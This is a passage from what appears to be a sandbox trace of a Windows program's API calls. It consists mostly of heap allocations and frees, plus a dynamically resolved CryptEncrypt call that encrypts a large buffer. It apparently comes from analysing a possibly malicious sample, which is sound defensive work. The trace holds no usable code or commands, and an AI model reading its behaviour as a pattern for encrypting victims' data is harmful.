(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0252.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0252.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0252.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0252.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0252.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0252.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0252.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0252.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0252.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0252.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0252.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0252.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0252.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0252.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f18) returned 0x2ea9168 [0252.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9168 | out: hHeap=0x970000) returned 1 [0252.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0252.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0252.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0252.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0252.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0252.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0252.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0252.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0252.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0252.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0252.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0252.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0252.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0252.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0252.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0252.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0252.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0252.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0252.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0252.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0252.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0252.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0252.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0252.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51b20 [0252.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51b20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0252.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0252.902] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0252.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54238 [0252.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0252.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0252.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0252.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0252.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0252.904] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94240*, pdwDataLen=0x8cef60*=0x14f18, dwBufLen=0x14f20 | out: pbData=0x2e94240*, pdwDataLen=0x8cef60*=0x14f20) returned 1 [0252.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0252.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0252.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0252.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0252.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0252.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0252.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0252.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0252.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 